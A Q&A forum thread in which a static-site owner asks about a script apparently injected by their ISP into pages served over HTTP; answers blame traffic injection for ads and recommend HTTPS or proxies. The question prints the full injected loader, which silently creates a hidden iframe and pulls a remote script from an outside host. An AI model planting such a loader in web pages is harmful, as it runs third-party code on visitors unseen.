1

I have a static website. I update the web pages locally in my computer then upload it using FileZilla. Yet, once uploaded I review the source code of any of my pages and see a script that is injected inside the <head>. The script does not change the layout or visible content of the page, so I do not know what it even does:

<script>
    if (top == window) {
        var engageNameSpace = "engagens";
        "undefined" == typeof window[engageNameSpace] && (window[engageNameSpace] = {}), window[engageNameSpace].engageLoader = function() {
            function e(e) {
                return "undefined" != typeof e && null !== e
            }

            function t() {
                var t = document.createElement("script");
                t.setAttribute("src", s), t.setAttribute("id", "fn_engage_script"), t.setAttribute("async", ""), (null == document.head || e(document.head)) && (document.head = document.getElementsByTagName("head")[0]), document.head.appendChild(t)
            }

            function n() {
                var t = r();
                if (e(t)) {
                    var n = t;
                    i() && (n = d(t));
                    var o;
                    try {
                        o = document.documentElement, o.appendChild(n)
                    } catch (c) {
                        o = document.body, o.appendChild(n)
                    }
                    a()
                }
            }

            function a() {
                function e(e) {
                    var n = e.data;
                    "l8IframeIsReady" === n.message && t()
                }
                window.addEventListener ? window.addEventListener("message", e, !1) : window.attachEvent("onmessage", e)
            }

            function r() {
                var t = document.createElement("iframe");
                if (e(t)) {
                    t.setAttribute("id", "fn_engage"), t.setAttribute("src", u), t.setAttribute("target", "_blank"), t.setAttribute("frameborder", "0");
                    var n = /firefox/i.exec(navigator.userAgent);
                    e(n) && n.length > 0 ? (t.style.height = 0, t.style.width = 0) : t.style.display = "none", t.frameBorder = "no"
                }
                return t
            }

            function i() {
                var t = !1,
                    n = /android (\d+)/i.exec(navigator.userAgent);
                return e(n) && n.length > 0 && (t = parseInt(n[1]) >= 4), t
            }

            function d(e) {
                var t = document.createElement("div");
                return t.setAttribute("id", "fn_wrapper_div"), t.style.position = "fixed", t.style.display = "none", t.ontouchstart = function() {
                    return !0
                }, t.appendChild(e), t
            }

            function o() {
                var t = void 0,
                    a = this,
                    r = function() {
                        e(t) && (window.clearTimeout(t), t = void 0, n.call(a))
                    };
                t = window.setTimeout(r, 1e4), "function" == typeof window.addEventListener ? window.addEventListener("load", r, !1) : window.attachEvent("onload", r)
            }
            var c = "http://globe.moreforme.net",
                u = c + "/l8/EngageService?v=1",
                s = c + "/scripts/Engage.js";
            o()
        };
        var engageLoader = new window[engageNameSpace].engageLoader
    }
</script>

Upon checking the url in the script http://globe.moreforme.net, I realize the script is most likely from our ISP (Globe). As I am a novice at internet security, I do not know how the script got there in the first place. My site is static HTML. How can I prevent that script from appearing in the source code once the page is uploaded?

EDIT:

Found this link that appears to be the template code for making the script. Anybody knows what the script does?

JAT86
  • 241

2 Answers2

3

First, this only works because you are on HTTP instead of HTTPS

Your ISP is injecting this script and then using it to dynamically load another script (in an iframe?).

For whatever reason I cant navigate to globe.moreforme.net which hosts the scripts ... it is redirecting me to globe.moreforme.ph so globe.moreforme.net is most likely only available to people using the ISP.

Now, if I had to take a wild guess ... I would say that the ISP is using this dynamically loaded script to hijack adverts on the pages you visit so as to claim the revue for themselves.

You should be able to prevent this by either only using HTTPS sites or by using a secure SOCKS5 Proxy (which is stupid simple to setup on a VPS for damn cheap) by looking into Dynamic Port Forwarding in SSH. Alternatively you could look into ShadowSocks if you are in a country that has a country wide firewall (china).

CaffeineAddiction
  • 274
0

This is the result of Globe Telecom partnering with evil Flash Networks to modify pages their customers are loading by adding their ads and probably hacking other peoples' ads.

Legality of this is questionable - they should be breaking at least copyright laws. But given the Philippine jurisdiction, I don't think there is anything you can do legally.

This is also the reason why all sites should use HTTPS and disabled HTTP (other then redirect to HTTPS). Today there are multiple ways to get SSL certificate for your DNS name for free, and it also improves your Google score.

Sergey Kandaurov
  • 101